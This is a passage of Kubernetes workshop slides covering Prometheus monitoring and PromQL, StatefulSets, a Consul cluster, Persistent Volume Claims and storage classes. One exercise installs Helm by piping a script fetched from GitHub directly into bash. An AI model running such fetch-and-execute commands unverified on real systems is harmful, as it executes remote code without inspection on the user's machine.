database* to store these metrics - a specific query language (PromQL) to query these time series - an *alert manager* to notify us according to metrics values or trends - We are going to use it to collect and query some metrics on our Kubernetes cluster .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Why Prometheus? - We don't endorse Prometheus more or less than any other system - It's relatively well integrated within the cloud-native ecosystem - It can be self-hosted (this is useful for tutorials like this) - It can be used for deployments of varying complexity: - one binary and 10 lines of configuration to get started - all the way to thousands of nodes and millions of metrics .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Exposing metrics to Prometheus - Prometheus obtains metrics and their values by querying *exporters* - An exporter serves metrics over HTTP, in plain text - This is what the *node exporter* looks like: http://demo.robustperception.io:9100/metrics - Prometheus itself exposes its own internal metrics, too: http://demo.robustperception.io:9090/metrics - If you want to expose custom metrics to Prometheus: - serve a text page like these, and you're good to go - libraries are available in various languages to help with quantiles etc. .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## How Prometheus gets these metrics - The *Prometheus server* will *scrape* URLs like these at regular intervals (by default: every minute; can be more/less frequent) - The list of URLs to scrape (the *scrape targets*) is defined in configuration .footnote[Worried about the overhead of parsing a text format?
Check this [comparison](https://github.com/RichiH/OpenMetrics/blob/master/markdown/protobuf_vs_text.md) of the text format with the (now deprecated) protobuf format!] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Defining scrape targets This is maybe the simplest configuration file for Prometheus: ```yaml scrape_configs: - job_name: 'prometheus' static_configs: - targets: ['localhost:9090'] ``` - In this configuration, Prometheus collects its own internal metrics - A typical configuration file will have multiple `scrape_configs` - In this configuration, the list of targets is fixed - A typical configuration file will use dynamic service discovery .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Service discovery This configuration file will leverage existing DNS `A` records: ```yaml scrape_configs: - ... - job_name: 'node' dns_sd_configs: - names: ['api-backends.dc-paris-2.enix.io'] type: 'A' port: 9100 ``` - In this configuration, Prometheus resolves the provided name(s) (here, `api-backends.dc-paris-2.enix.io`) - Each resulting IP address is added as a target on port 9100 .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Dynamic service discovery - In the DNS example, the names are re-resolved at regular intervals - As DNS records are created/updated/removed, scrape targets change as well - Existing data (previously collected metrics) is not deleted - Other service discovery backends work in a similar fashion .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Other service discovery mechanisms - Prometheus can connect to e.g. a cloud API to list instances - Or to the Kubernetes API to list nodes, pods, services ... - Or a service like Consul, Zookeeper, etcd, to list applications - The resulting configurations files are *way more complex* (but don't worry, we won't need to write them ourselves) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Time series database - We could wonder, "why do we need a specialized database?" - One metrics data point = metrics ID + timestamp + value - With a classic SQL or noSQL data store, that's at least 160 bits of data + indexes - Prometheus is way more efficient, without sacrificing performance (it will even be gentler on the I/O subsystem since it needs to write less) - Would you like to know more? Check this video: [Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Checking if Prometheus is installed - Before trying to install Prometheus, let's check if it's already there .exercise[ - Look for services with a label `app=prometheus` across all namespaces: ```bash kubectl get services --selector=app=prometheus --all-namespaces ``` ] If we see a `NodePort` service called `prometheus-server`, we're good! (We can then skip to "Connecting to the Prometheus web UI".) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Running Prometheus on our cluster We need to: - Run the Prometheus server in a pod (using e.g. a Deployment to ensure that it keeps running) - Expose the Prometheus server web UI (e.g. with a NodePort) - Run the *node exporter* on each node (with a Daemon Set) - Set up a Service Account so that Prometheus can query the Kubernetes API - Configure the Prometheus server (storing the configuration in a Config Map for easy updates) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Helm charts to the rescue - To make our lives easier, we are going to use a Helm chart - The Helm chart will take care of all the steps explained above (including some extra features that we don't need, but won't hurt) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Step 1: install Helm - If we already installed Helm earlier, this command won't break anything .exercise[ - Install the Helm CLI: ```bash curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 \ | bash ``` ] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Step 2: add the `stable` repo - This will add the repository containing the chart for Prometheus - This command is idempotent (it won't break anything if the repository was already added) .exercise[ - Add the repository: ```bash helm repo add stable https://kubernetes-charts.storage.googleapis.com/ ``` ] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Step 3: install Prometheus - The following command, just like the previous ones, is idempotent (it won't error out if Prometheus is already installed) .exercise[ - Install Prometheus on our cluster: ```bash helm upgrade prometheus stable/prometheus \ --install \ --namespace kube-system \ --set server.service.type=NodePort \ --set server.service.nodePort=30090 \ --set server.persistentVolume.enabled=false \ --set alertmanager.enabled=false ``` ] Curious about all these flags? They're explained in the next slide. .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Explaining all the Helm flags - `helm upgrade prometheus` → upgrade release "prometheus" to the latest version... (a "release" is a unique name given to an app deployed with Helm) - `stable/prometheus` → ... of the chart `prometheus` in repo `stable` - `--install` → if the app doesn't exist, create it - `--namespace kube-system` → put it in that specific namespace - And set the following *values* when rendering the chart's templates: - `server.service.type=NodePort` → expose the Prometheus server with a NodePort - `server.service.nodePort=30090` → set the specific NodePort number to use - `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim - `alertmanager.enabled=false` → disable the alert manager entirely .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Connecting to the Prometheus web UI - Let's connect to the web UI and see what we can do .exercise[ - Figure out the NodePort that was allocated to the Prometheus server: ```bash kubectl get svc --all-namespaces | grep prometheus-server ``` - With your browser, connect to that port ] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Querying some metrics - This is easy... if you are familiar with PromQL .exercise[ - Click on "Graph", and in "expression", paste the following: ``` sum by (instance) ( irate( container_cpu_usage_seconds_total{ pod_name=~"worker.*" }[5m] ) ) ``` ] - Click on the blue "Execute" button and on the "Graph" tab just below - We see the cumulated CPU usage of worker pods for each node
(if we just deployed Prometheus, there won't be much data to see, though) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Getting started with PromQL - We can't learn PromQL in just 5 minutes - But we can cover the basics to get an idea of what is possible (and have some keywords and pointers) - We are going to break down the query above (building it one step at a time) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Graphing one metric across all tags This query will show us CPU usage across all containers: ``` container_cpu_usage_seconds_total ``` - The suffix of the metrics name tells us: - the unit (seconds of CPU) - that it's the total used since the container creation - Since it's a "total," it is an increasing quantity (we need to compute the derivative if we want e.g. CPU % over time) - We see that the metrics retrieved have *tags* attached to them .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Selecting metrics with tags This query will show us only metrics for worker containers: ``` container_cpu_usage_seconds_total{pod_name=~"worker.*"} ``` - The `=~` operator allows regex matching - We select all the pods with a name starting with `worker` (it would be better to use labels to select pods; more on that later) - The result is a smaller set of containers .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Transforming counters in rates This query will show us CPU usage % instead of total seconds used: ``` 100*irate(container_cpu_usage_seconds_total{pod_name=~"worker.*"}[5m]) ``` - The [`irate`](https://prometheus.io/docs/prometheus/latest/querying/functions/#irate) operator computes the "per-second instant rate of increase" - `rate` is similar but allows decreasing counters and negative values - with `irate`, if a counter goes back to zero, we don't get a negative spike - The `[5m]` tells how far to look back if there is a gap in the data - And we multiply with `100*` to get CPU % usage .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Aggregation operators This query sums the CPU usage per node: ``` sum by (instance) ( irate(container_cpu_usage_seconds_total{pod_name=~"worker.*"}[5m]) ) ``` - `instance` corresponds to the node on which the container is running - `sum by (instance) (...)` computes the sum for each instance - Note: all the other tags are collapsed (in other words, the resulting graph only shows the `instance` tag) - PromQL supports many more [aggregation operators](https://prometheus.io/docs/prometheus/latest/querying/operators/#aggregation-operators) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## What kind of metrics can we collect? - Node metrics (related to physical or virtual machines) - Container metrics (resource usage per container) - Databases, message queues, load balancers, ... (check out this [list of exporters](https://prometheus.io/docs/instrumenting/exporters/)!) - Instrumentation (=deluxe `printf` for our code) - Business metrics (customers served, revenue, ...) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Node metrics - CPU, RAM, disk usage on the whole node - Total number of processes running, and their states - Number of open files, sockets, and their states - I/O activity (disk, network), per operation or volume - Physical/hardware (when applicable): temperature, fan speed... - ...and much more! .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Container metrics - Similar to node metrics, but not totally identical - RAM breakdown will be different - active vs inactive memory - some memory is *shared* between containers, and specially accounted for - I/O activity is also harder to track - async writes can cause deferred "charges" - some page-ins are also shared between containers For details about container metrics, see:
http://jpetazzo.github.io/2013/10/08/docker-containers-metrics/ .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Application metrics - Arbitrary metrics related to your application and business - System performance: request latency, error rate... - Volume information: number of rows in database, message queue size... - Business data: inventory, items sold, revenue... .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Detecting scrape targets - Prometheus can leverage Kubernetes service discovery (with proper configuration) - Services or pods can be annotated with: - `prometheus.io/scrape: true` to enable scraping - `prometheus.io/port: 9090` to indicate the port number - `prometheus.io/path: /metrics` to indicate the URI (`/metrics` by default) - Prometheus will detect and scrape these (without needing a restart or reload) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Querying labels - What if we want to get metrics for containers belonging to a pod tagged `worker`? - The cAdvisor exporter does not give us Kubernetes labels - Kubernetes labels are exposed through another exporter - We can see Kubernetes labels through metrics `kube_pod_labels` (each container appears as a time series with constant value of `1`) - Prometheus *kind of* supports "joins" between time series - But only if the names of the tags match exactly .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Unfortunately ... - The cAdvisor exporter uses tag `pod_name` for the name of a pod - The Kubernetes service endpoints exporter uses tag `pod` instead - See [this blog post](https://www.robustperception.io/exposing-the-software-version-to-prometheus) or [this other one](https://www.weave.works/blog/aggregating-pod-resource-cpu-memory-usage-arbitrary-labels-prometheus/) to see how to perform "joins" - Alas, Prometheus cannot "join" time series with different labels (see [Prometheus issue #2204](https://github.com/prometheus/prometheus/issues/2204) for the rationale) - There is a workaround involving relabeling, but it's "not cheap" - see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview - or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## In practice - Grafana is a beautiful (and useful) frontend to display all kinds of graphs - Not everyone needs to know Prometheus, PromQL, Grafana, etc. - But in a team, it is valuable to have at least one person who know them - That person can set up queries and dashboards for the rest of the team - It's a little bit like knowing how to optimize SQL queries, Dockerfiles... Don't panic if you don't know these tools! ...But make sure at least one person in your team is on it 💯 ??? :EN:- Collecting metrics with Prometheus :FR:- Collecter des métriques avec Prometheus .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/two-containers-on-a-truck.jpg)] --- name: toc-stateful-sets class: title Stateful sets .nav[ [Previous section](#toc-collecting-metrics-with-prometheus) | [Back to table of contents](#toc-module-4) | [Next section](#toc-running-a-consul-cluster) ] .debug[(automatically generated title slide)] --- # Stateful sets - Stateful sets are a type of resource in the Kubernetes API (like pods, deployments, services...) - They offer mechanisms to deploy scaled stateful applications - At a first glance, they look like *deployments*: - a stateful set defines a pod spec and a number of replicas *R* - it will make sure that *R* copies of the pod are running - that number can be changed while the stateful set is running - updating the pod spec will cause a rolling update to happen - But they also have some significant differences .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Stateful sets unique features - Pods in a stateful set are numbered (from 0 to *R-1*) and ordered - They are started and updated in order (from 0 to *R-1*) - A pod is started (or updated) only when the previous one is ready - They are stopped in reverse order (from *R-1* to 0) - Each pod know its identity (i.e. which number it is in the set) - Each pod can discover the IP address of the others easily - The pods can persist data on attached volumes 🤔 Wait a minute ... Can't we already attach volumes to pods and deployments? .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Revisiting volumes - [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes: - sharing data between containers in a pod - exposing configuration information and secrets to containers - accessing storage systems - Let's see examples of the latter usage .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Volumes types - There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available: - public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...) - private cloud storage (Cinder, VsphereVolume...) - traditional storage systems (NFS, iSCSI, FC...) - distributed storage (Ceph, Glusterfs, Portworx...) - Using a persistent volume requires: - creating the volume out-of-band (outside of the Kubernetes API) - referencing the volume in the pod description, with all its parameters .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Using a cloud volume Here is a pod definition using an AWS EBS volume (that has to be created first): ```yaml apiVersion: v1 kind: Pod metadata: name: pod-using-my-ebs-volume spec: containers: - image: ... name: container-using-my-ebs-volume volumeMounts: - mountPath: /my-ebs name: my-ebs-volume volumes: - name: my-ebs-volume awsElasticBlockStore: volumeID: vol-049df61146c4d7901 fsType: ext4 ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Using an NFS volume Here is another example using a volume on an NFS server: ```yaml apiVersion: v1 kind: Pod metadata: name: pod-using-my-nfs-volume spec: containers: - image: ... name: container-using-my-nfs-volume volumeMounts: - mountPath: /my-nfs name: my-nfs-volume volumes: - name: my-nfs-volume nfs: server: 192.168.0.55 path: "/exports/assets" ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Shortcomings of volumes - Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API (we can't just use `kubectl apply/create/delete/...` to manage them) - If a Deployment uses a volume, all replicas end up using the same volume - That volume must then support concurrent access - some volumes do (e.g. NFS servers support multiple read/write access) - some volumes support concurrent reads - some volumes support concurrent access for colocated pods - What we really need is a way for each replica to have its own volume .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Individual volumes - The Pods of a Stateful set can have individual volumes (i.e. in a Stateful set with 3 replicas, there will be 3 volumes) - These volumes can be either: - allocated from a pool of pre-existing volumes (disks, partitions ...) - created dynamically using a storage system - This introduces a bunch of new Kubernetes resource types: Persistent Volumes, Persistent Volume Claims, Storage Classes (and also `volumeClaimTemplates`, that appear within Stateful Set manifests!) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Stateful set recap - A Stateful sets manages a number of identical pods (like a Deployment) - These pods are numbered, and started/upgraded/stopped in a specific order - These pods are aware of their number (e.g., #0 can decide to be the primary, and #1 can be secondary) - These pods can find the IP addresses of the other pods in the set (through a *headless service*) - These pods can each have their own persistent storage (Deployments cannot do that) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/wall-of-containers.jpeg)] --- name: toc-running-a-consul-cluster class: title Running a Consul cluster .nav[ [Previous section](#toc-stateful-sets) | [Back to table of contents](#toc-module-4) | [Next section](#toc-persistent-volumes-claims) ] .debug[(automatically generated title slide)] --- # Running a Consul cluster - Here is a good use-case for Stateful sets! - We are going to deploy a Consul cluster with 3 nodes - Consul is a highly-available key/value store (like etcd or Zookeeper) - One easy way to bootstrap a cluster is to tell each node: - the addresses of other nodes - how many nodes are expected (to know when quorum is reached) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Bootstrapping a Consul cluster *After reading the Consul documentation carefully (and/or asking around), we figure out the minimal command-line to run our Consul cluster.* ``` consul agent -data-dir=/consul/data -client=0.0.0.0 -server -ui \ -bootstrap-expect=3 \ -retry-join=`X.X.X.X` \ -retry-join=`Y.Y.Y.Y` ``` - Replace X.X.X.X and Y.Y.Y.Y with the addresses of other nodes - The same command-line can be used on all nodes (convenient!) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Cloud Auto-join - Since version 1.4.0, Consul can use the Kubernetes API to find its peers - This is called [Cloud Auto-join] - Instead of passing an IP address, we need to pass a parameter like this: ``` consul agent -retry-join "provider=k8s label_selector=\"app=consul\"" ``` - Consul needs to be able to talk to the Kubernetes API - We can provide a `kubeconfig` file - If Consul runs in a pod, it will use the *service account* of the pod [Cloud Auto-join]: https://www.consul.io/docs/agent/cloud-auto-join.html#kubernetes-k8s- .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Setting up Cloud auto-join - We need to create a service account for Consul - We need to create a role that can `list` and `get` pods - We need to bind that role to the service account - And of course, we need to make sure that Consul pods use that service account .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Putting it all together - The file `k8s/consul.yaml` defines the required resources (service account, cluster role, cluster role binding, service, stateful set) - It has a few extra touches: - a `podAntiAffinity` prevents two pods from running on the same node - a `preStop` hook makes the pod leave the cluster when shutdown gracefully This was inspired by this [excellent tutorial](https://github.com/kelseyhightower/consul-on-kubernetes) by Kelsey Hightower. Some features from the original tutorial (TLS authentication between nodes and encryption of gossip traffic) were removed for simplicity. .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Running our Consul cluster - We'll use the provided YAML file .exercise[ - Create the stateful set and associated service: ```bash kubectl apply -f ~/container.training/k8s/consul.yaml ``` - Check the logs as the pods come up one after another: ```bash stern consul ``` - Check the health of the cluster: ```bash kubectl exec consul-0 consul members ``` ] .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Caveats - We aren't using actual persistence yet (no `volumeClaimTemplate`, Persistent Volume, etc.) - What happens if we lose a pod? - a new pod gets rescheduled (with an empty state) - the new pod tries to connect to the two others - it will be accepted (after 1-2 minutes of instability) - and it will retrieve the data from the other pods .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Failure modes - What happens if we lose two pods? - manual repair will be required - we will need to instruct the remaining one to act solo - then rejoin new pods - What happens if we lose three pods? (aka all of them) - we lose all the data (ouch) - If we run Consul without persistent storage, backups are a good idea! .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg)] --- name: toc-persistent-volumes-claims class: title Persistent Volumes Claims .nav[ [Previous section](#toc-running-a-consul-cluster) | [Back to table of contents](#toc-module-4) | [Next section](#toc-local-persistent-volumes) ] .debug[(automatically generated title slide)] --- # Persistent Volumes Claims - Our Pods can use a special volume type: a *Persistent Volume Claim* - A Persistent Volume Claim (PVC) is also a Kubernetes resource (visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`) - A PVC is not a volume; it is a *request for a volume* - It should indicate at least: - the size of the volume (e.g. "5 GiB") - the access mode (e.g. "read-write by a single pod") .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## What's in a PVC? - A PVC contains at least: - a list of *access modes* (ReadWriteOnce, ReadOnlyMany, ReadWriteMany) - a size (interpreted as the minimal storage space needed) - It can also contain optional elements: - a selector (to restrict which actual volumes it can use) - a *storage class* (used by dynamic provisioning, more on that later) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## What does a PVC look like? Here is a manifest for a basic PVC: ```yaml kind: PersistentVolumeClaim apiVersion: v1 metadata: name: my-claim spec: accessModes: - ReadWriteOnce resources: requests: storage: 1Gi ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Using a Persistent Volume Claim Here is a Pod definition like the ones shown earlier, but using a PVC: ```yaml apiVersion: v1 kind: Pod metadata: name: pod-using-a-claim spec: containers: - image: ... name: container-using-a-claim volumeMounts: - mountPath: /my-vol name: my-volume volumes: - name: my-volume persistentVolumeClaim: claimName: my-claim ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Creating and using Persistent Volume Claims - PVCs can be created manually and used explicitly (as shown on the previous slides) - They can also be created and used through Stateful Sets (this will be shown later) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Lifecycle of Persistent Volume Claims - When a PVC is created, it starts existing in "Unbound" state (without an associated volume) - A Pod referencing an unbound PVC will not start (the scheduler will wait until the PVC is bound to place it) - A special controller continuously monitors PVCs to associate them with PVs - If no PV is available, one must be created: - manually (by operator intervention) - using a *dynamic provisioner* (more on that later) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: extra-details ## Which PV gets associated to a PVC? - The PV must satisfy the PVC constraints (access mode, size, optional selector, optional storage class) - The PVs with the closest access mode are picked - Then the PVs with the closest size - It is possible to specify a `claimRef` when creating a PV (this will associate it to the specified PVC, but only if the PV satisfies all the requirements of the PVC; otherwise another PV might end up being picked) - For all the details about the PersistentVolumeClaimBinder, check [this doc](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/storage/persistent-storage.md#matching-and-binding) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Persistent Volume Claims and Stateful sets - A Stateful set can define one (or more) `volumeClaimTemplate` - Each `volumeClaimTemplate` will create one Persistent Volume Claim per pod - Each pod will therefore have its own individual volume - These volumes are numbered (like the pods) - Example: - a Stateful set is named `db` - it is scaled to replicas - it has a `volumeClaimTemplate` named `data` - then it will create pods `db-0`, `db-1`, `db-2` - these pods will have volumes named `data-db-0`, `data-db-1`, `data-db-2` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Persistent Volume Claims are sticky - When updating the stateful set (e.g. image upgrade), each pod keeps its volume - When pods get rescheduled (e.g. node failure), they keep their volume (this requires a storage system that is not node-local) - These volumes are not automatically deleted (when the stateful set is scaled down or deleted) - If a stateful set is scaled back up later, the pods get their data back .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Dynamic provisioners - A *dynamic provisioner* monitors unbound PVCs - It can create volumes (and the corresponding PV) on the fly - This requires the PVCs to have a *storage class* (annotation `volume.beta.kubernetes.io/storage-provisioner`) - A dynamic provisioner only acts on PVCs with the right storage class (it ignores the other ones) - Just like `LoadBalancer` services, dynamic provisioners are optional (i.e. our cluster may or may not have one pre-installed) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## What's a Storage Class? - A Storage Class is yet another Kubernetes API resource (visible with e.g. `kubectl get storageclass` or `kubectl get sc`) - It indicates which *provisioner* to use (which controller will create the actual volume) - And arbitrary parameters for that provisioner (replication levels, type of disk ... anything relevant!) - Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/) (but we can also create volumes manually, and ignore Storage Classes) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## The default storage class - At most one storage class can be marked as the default class (by annotating it with `storageclass.kubernetes.io/is-default-class=true`) - When a PVC is created, it will be annotated with the default storage class (unless it specifies an explicit storage class) - This only happens at PVC creation (existing PVCs are not updated when we mark a class as the default one) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Dynamic provisioning setup This is how we can achieve fully automated provisioning of persistent storage. 1. Configure a storage system. (It needs to have an API, or be capable of automated provisioning of volumes.) 2. Install a dynamic provisioner for this storage system. (This is some specific controller code.) 3. Create a Storage Class for this system. (It has to match what the dynamic provisioner is expecting.) 4. Annotate the Storage Class to be the default one. .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Dynamic provisioning usage After setting up the system (previous slide), all we need to do is: *Create a Stateful Set that makes use of a `volumeClaimTemplate`.* This will trigger the following actions. 1. The Stateful Set creates PVCs according to the `volumeClaimTemplate`. 2. The Stateful Set creates Pods using these PVCs. 3. The PVCs are automatically annotated with our Storage Class. 4. The dynamic provisioner provisions volumes and creates the corresponding PVs. 5. The PersistentVolumeClaimBinder associates the PVs and the PVCs together. 6. PVCs are now bound, the Pods can start. ??? :EN:- Deploying apps with Stateful Sets :EN:- Example: deploying a Consul cluster :EN:- Understanding Persistent Volume Claims and Storage Classes :FR:- Déployer une application avec un *Stateful Set* :FR:- Example : lancer un cluster Consul :FR:- Comprendre les *Persistent Volume Claims* et *Storage Classes* .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/ShippingContainerSFBay.jpg)] --- name: toc-local-persistent-volumes class: title Local Persistent Volumes .nav[ [Previous section](#toc-persistent-volumes-claims) | [Back to table of contents](#toc-module-4) | [Next section](#toc-highly-available-persistent-volumes) ] .debug[(automatically generated title slide)] --- # Local Persistent Volumes - We want to run that Consul cluster *and* actually persist data - But we don't have a distributed storage system - We are going to use local volumes instead (similar conceptually to `hostPath` volumes) - We can use local volumes without installing extra plugins - However, they are tied to a node - If that node goes down, the volume becomes unavailable .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## With or without dynamic provisioning - We will deploy a Consul cluster *with* persistence - That cluster's StatefulSet will create PVCs - These PVCs will remain unbound¹, until we will create local volumes manually (we will basically do the job of the dynamic provisioner) - Then, we will see how to automate that with a dynamic provisioner .footnote[¹Unbound = without an associated Persistent Volume.] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## If we have a dynamic provisioner ... - The labs in this section assume that we *do not* have a dynamic provisioner - If we do have one, we need to disable it .exercise[ - Check if we have a dynamic provisioner: ```bash kubectl get storageclass ``` - If the output contains a line with `(default)`, run this command: ```bash kubectl annotate sc storageclass.kubernetes.io/is-default-class- --all ``` - Check again that it is no longer marked as `(default)` ] 